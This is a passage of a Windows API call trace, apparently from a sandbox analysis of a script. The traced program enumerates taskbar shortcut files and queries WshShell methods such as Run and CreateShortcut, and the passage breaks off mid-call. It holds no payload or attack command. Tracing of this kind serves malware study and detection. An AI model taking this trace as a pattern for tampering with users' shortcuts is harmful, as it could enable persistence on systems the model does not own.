ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0165.969] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0165.969] FindClose (in: hFindFile=0x5bfe278 | out: hFindFile=0x5bfe278) returned 1 [0165.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e204) returned 1 [0165.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e464) returned 1 [0165.969] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d9c8360, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0x4d9c8360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.969] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f125f50, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.969] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0f5210, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f0f5210, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed7ee60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (2).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0165.970] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0165.970] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f10d8b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f10d8b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer (2).lnk", cAlternateFileName="WINDOW~3.LNK")) returned 1 [0165.970] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0165.970] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f125f50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f125f50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xd869fe87, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player (2).lnk", cAlternateFileName="WINDOW~4.LNK")) returned 1 [0165.971] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0165.971] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0165.971] FindClose (in: hFindFile=0x5bfe138 | out: hFindFile=0x5bfe138) returned 1 [0165.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e204) returned 1 [0165.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e464) returned 1 [0165.972] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk")) returned 0x20 [0165.973] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x7a [0165.973] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk", nBufferLength=0x7a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk", lpFilePart=0x0) returned 0x79 [0165.975] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0e0d4 | out: lpPerformanceCount=0x5a0e0d4*=2945078555889) returned 1 [0165.977] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0e09c | out: lpPerformanceCount=0x5a0e09c*=2945078778933) returned 1 [0166.030] CoGetContextToken (in: pToken=0x5a0dd84 | out: pToken=0x5a0dd84) returned 0x0 [0166.030] CoGetContextToken (in: pToken=0x5a0dce4 | out: pToken=0x5a0dce4) returned 0x0 [0166.030] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x5a0ddb4*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x5a0ddb0 | out: ppvObject=0x5a0ddb0*=0x0) returned 0x80004002 [0166.057] CoGetContextToken (in: pToken=0x5a0dd34 | out: pToken=0x5a0dd34) returned 0x0 [0166.057] CoGetContextToken (in: pToken=0x5a0dc94 | out: pToken=0x5a0dc94) returned 0x0 [0166.057] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x5a0dd64*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x5a0dd60 | out: ppvObject=0x5a0dd60*=0x0) returned 0x80004002 [0166.066] CoGetContextToken (in: pToken=0x5a0dd44 | out: pToken=0x5a0dd44) returned 0x0 [0166.066] CoGetContextToken (in: pToken=0x5a0dca4 | out: pToken=0x5a0dca4) returned 0x0 [0166.066] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x5a0dd74*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x5a0dd70 | out: ppvObject=0x5a0dd70*=0x0) returned 0x80004002 [0166.122] CoGetContextToken (in: pToken=0x5a0dd3c | out: pToken=0x5a0dd3c) returned 0x0 [0166.122] CoGetContextToken (in: pToken=0x5a0dc9c | out: pToken=0x5a0dc9c) returned 0x0 [0166.122] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x5a0dd6c*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd68 | out: ppvObject=0x5a0dd68*=0x283d20) returned 0x0 [0166.122] WshShell:IUnknown:AddRef (This=0x283d20) returned 0x3 [0166.123] WshShell:IUnknown:Release (This=0x283d20) returned 0x2 [0166.137] WshShell:IDispatch:GetTypeInfoCount (in: This=0x283d20, pctinfo=0x5a0dd70 | out: pctinfo=0x5a0dd70) returned 0x0 [0166.137] WshShell:IDispatch:GetTypeInfo (in: This=0x283d20, iTInfo=0x0, lcid=0x0, ppTInfo=0x5a0dd6c | out: ppTInfo=0x5a0dd6c*=0x5c3dbf0) returned 0x0 [0166.138] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbf0, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d86c | out: ppvObject=0x5a0d86c*=0x5c3dbf0) returned 0x0 [0166.138] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbf0, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0d820 | out: ppvObject=0x5a0d820*=0x0) returned 0x80004002 [0166.139] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbf0, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d648 | out: ppvObject=0x5a0d648*=0x0) returned 0x80004002 [0166.139] WshShell:IUnknown:AddRef (This=0x5c3dbf0) returned 0x4 [0166.139] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbf0, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d17c | out: ppvObject=0x5a0d17c*=0x0) returned 0x80004002 [0166.139] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbf0, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d12c | out: ppvObject=0x5a0d12c*=0x0) returned 0x80004002 [0166.139] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbf0, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d138 | out: ppvObject=0x5a0d138*=0x0) returned 0x80004002 [0166.139] CoGetContextToken (in: pToken=0x5a0d198 | out: pToken=0x5a0d198) returned 0x0 [0166.139] CoGetContextToken (in: pToken=0x5a0d5ac | out: pToken=0x5a0d5ac) returned 0x0 [0166.139] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbf0, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d62c | out: ppvObject=0x5a0d62c*=0x0) returned 0x80004002 [0166.139] WshShell:IUnknown:Release (This=0x5c3dbf0) returned 0x3 [0166.140] CoGetContextToken (in: pToken=0x5a0db8c | out: pToken=0x5a0db8c) returned 0x0 [0166.140] CoGetContextToken (in: pToken=0x5a0daec | out: pToken=0x5a0daec) returned 0x0 [0166.140] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbf0, riid=0x5a0dbbc*(Data1=0x20401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dbb8 | out: ppvObject=0x5a0dbb8*=0x5c3dbf0) returned 0x0 [0166.140] WshShell:IUnknown:AddRef (This=0x5c3dbf0) returned 0x5 [0166.140] WshShell:IUnknown:Release (This=0x5c3dbf0) returned 0x4 [0166.140] WshShell:IUnknown:Release (This=0x5c3dbf0) returned 0x3 [0166.144] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dbf0, ppTypeAttr=0x5a0dd70, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0dd70, pDummy=0x44f89ed2) returned 0x0 [0166.145] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dbf0) returned 0x633acc8 [0166.152] ITypeInfo:GetRefTypeOfImplType (in: This=0x5c3dbf0, index=0xffffffff, pRefType=0x5a0dd70 | out: pRefType=0x5a0dd70*=0xfffffffe) returned 0x0 [0166.154] ITypeInfo:GetRefTypeInfo (in: This=0x5c3dbf0, hreftype=0xfffffffe, ppTInfo=0x5a0dd2c | out: ppTInfo=0x5a0dd2c*=0x5c3dbc4) returned 0x0 [0166.154] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbc4, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d7f0 | out: ppvObject=0x5a0d7f0*=0x5c3dbc4) returned 0x0 [0166.154] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbc4, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0d7a4 | out: ppvObject=0x5a0d7a4*=0x0) returned 0x80004002 [0166.154] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbc4, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d5cc | out: ppvObject=0x5a0d5cc*=0x0) returned 0x80004002 [0166.155] WshShell:IUnknown:AddRef (This=0x5c3dbc4) returned 0x6 [0166.155] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbc4, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d100 | out: ppvObject=0x5a0d100*=0x0) returned 0x80004002 [0166.155] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbc4, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d0b0 | out: ppvObject=0x5a0d0b0*=0x0) returned 0x80004002 [0166.155] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbc4, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d0bc | out: ppvObject=0x5a0d0bc*=0x0) returned 0x80004002 [0166.155] CoGetContextToken (in: pToken=0x5a0d11c | out: pToken=0x5a0d11c) returned 0x0 [0166.155] CoGetContextToken (in: pToken=0x5a0d52c | out: pToken=0x5a0d52c) returned 0x0 [0166.155] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbc4, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d5b0 | out: ppvObject=0x5a0d5b0*=0x0) returned 0x80004002 [0166.155] WshShell:IUnknown:Release (This=0x5c3dbc4) returned 0x5 [0166.155] CoGetContextToken (in: pToken=0x5a0dafc | out: pToken=0x5a0dafc) returned 0x0 [0166.155] CoGetContextToken (in: pToken=0x5a0da5c | out: pToken=0x5a0da5c) returned 0x0 [0166.155] WshShell:IUnknown:QueryInterface (in: This=0x5c3dbc4, riid=0x5a0db2c*(Data1=0x20401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0db28 | out: ppvObject=0x5a0db28*=0x5c3dbc4) returned 0x0 [0166.155] WshShell:IUnknown:AddRef (This=0x5c3dbc4) returned 0x7 [0166.155] WshShell:IUnknown:Release (This=0x5c3dbc4) returned 0x6 [0166.155] WshShell:IUnknown:Release (This=0x5c3dbc4) returned 0x5 [0166.155] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dbc4, ppTypeAttr=0x5a0dd70, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0dd70, pDummy=0x44f89ed2) returned 0x0 [0166.156] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dbc4) returned 0x633acc8 [0166.156] ITypeInfo:RemoteGetDocumentation (in: This=0x5c3dbc4, memid=-1, refPtrFlags=0x5a0dce8, pbstrName=0x5a0dce4, pBstrDocString=0x5a0dd38, pdwHelpContext=0x5a0dcdc, pBstrHelpFile=0x44f89ed2 | out: pbstrName=0x5a0dce4*="Shell Object Interface", pBstrDocString=0x5a0dd38*=0x0, pdwHelpContext=0x5a0dcdc*=0x0, pBstrHelpFile=0x44f89ed2) returned 0x0 [0166.157] SysStringByteLen (bstr="IWshShell3") returned 0x14 [0166.157] SysStringByteLen (bstr="Shell Object Interface") returned 0x2c [0166.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x0, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.165] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x1, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.165] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x63445f8 [0166.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x2, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.165] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x63445f8 [0166.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x3, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.166] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x4, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.166] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x5, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.166] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x62ae0e8 [0166.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x6, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.167] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5bcd228 [0166.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x7, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.167] CoTaskMemAlloc (cb=0x4) returned 0x6319730 [0166.168] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=100, rgBstrNames=0x6319730, cMaxNames=0x1, pcNames=0x5a0dd4c | out: rgBstrNames=0x6319730*="SpecialFolders", pcNames=0x5a0dd4c*=0x1) returned 0x0 [0166.168] SysStringByteLen (bstr="SpecialFolders") returned 0x1c [0166.168] SysStringByteLen (bstr="SpecialFolders") returned 0x1c [0166.169] CoTaskMemFree (pv=0x6319730) [0166.170] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.170] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x8, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.170] CoTaskMemAlloc (cb=0x8) returned 0x6319730 [0166.170] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=200, rgBstrNames=0x6319730, cMaxNames=0x2, pcNames=0x5a0dd4c | out: rgBstrNames=0x6319730*="Environment", pcNames=0x5a0dd4c*=0x2) returned 0x0 [0166.170] SysStringByteLen (bstr="Environment") returned 0x16 [0166.170] SysStringByteLen (bstr="Environment") returned 0x16 [0166.170] SysStringByteLen (bstr="Type") returned 0x8 [0166.171] SysStringByteLen (bstr="Type") returned 0x8 [0166.171] CoTaskMemFree (pv=0x6319730) [0166.171] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.171] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x9, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.171] CoTaskMemAlloc (cb=0x10) returned 0x5bfab28 [0166.171] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=1000, rgBstrNames=0x5bfab28, cMaxNames=0x4, pcNames=0x5a0dd4c | out: rgBstrNames=0x5bfab28*="Run", pcNames=0x5a0dd4c*=0x4) returned 0x0 [0166.171] SysStringByteLen (bstr="Run") returned 0x6 [0166.171] SysStringByteLen (bstr="Run") returned 0x6 [0166.171] SysStringByteLen (bstr="Command") returned 0xe [0166.171] SysStringByteLen (bstr="Command") returned 0xe [0166.171] SysStringByteLen (bstr="WindowStyle") returned 0x16 [0166.172] SysStringByteLen (bstr="WindowStyle") returned 0x16 [0166.172] SysStringByteLen (bstr="WaitOnReturn") returned 0x18 [0166.172] SysStringByteLen (bstr="WaitOnReturn") returned 0x18 [0166.172] CoTaskMemFree (pv=0x5bfab28) [0166.206] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x62ae0e8 [0166.206] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0xa, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.206] CoTaskMemAlloc (cb=0x14) returned 0x62f5890 [0166.206] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=1001, rgBstrNames=0x62f5890, cMaxNames=0x5, pcNames=0x5a0dd4c | out: rgBstrNames=0x62f5890*="Popup", pcNames=0x5a0dd4c*=0x5) returned 0x0 [0166.206] SysStringByteLen (bstr="Popup") returned 0xa [0166.206] SysStringByteLen (bstr="Popup") returned 0xa [0166.206] SysStringByteLen (bstr="Text") returned 0x8 [0166.206] SysStringByteLen (bstr="Text") returned 0x8 [0166.206] SysStringByteLen (bstr="SecondsToWait") returned 0x1a [0166.206] SysStringByteLen (bstr="SecondsToWait") returned 0x1a [0166.206] SysStringByteLen (bstr="Title") returned 0xa [0166.206] SysStringByteLen (bstr="Title") returned 0xa [0166.206] SysStringByteLen (bstr="Type") returned 0x8 [0166.207] SysStringByteLen (bstr="Type") returned 0x8 [0166.207] CoTaskMemFree (pv=0x62f5890) [0166.208] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x62ae0e8 [0166.208] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0xb, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.208] CoTaskMemAlloc (cb=0x8) returned 0x6319730 [0166.208] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=1002, rgBstrNames=0x6319730, cMaxNames=0x2, pcNames=0x5a0dd4c | out: rgBstrNames=0x6319730*="CreateShortcut", pcNames=0x5a0dd4c*=0x2) returned 0x0 [0166.208] SysStringByteLen (bstr="CreateShortcut") returned 0x1c [0166.208] SysStringByteLen (bstr="CreateShortcut") returned 0x1c [0166.208] SysStringByteLen (bstr="PathLink") returned 0x10 [0166.208] SysStringByteLen (bstr="PathLink") returned 0x10 [0166.208] CoTaskMemFree (pv=0x6319730) [0166.208] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.209] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0xc, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.209] CoTaskMemAlloc (cb=0x8) returned 0x6319730 [0166.209] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=1006, rgBstrNames=0x6319730, cMaxNames=0x2, pcNames=0x5a0dd4c | out: rgBstrNames=0x6319730*="ExpandEnvironmentStrings", 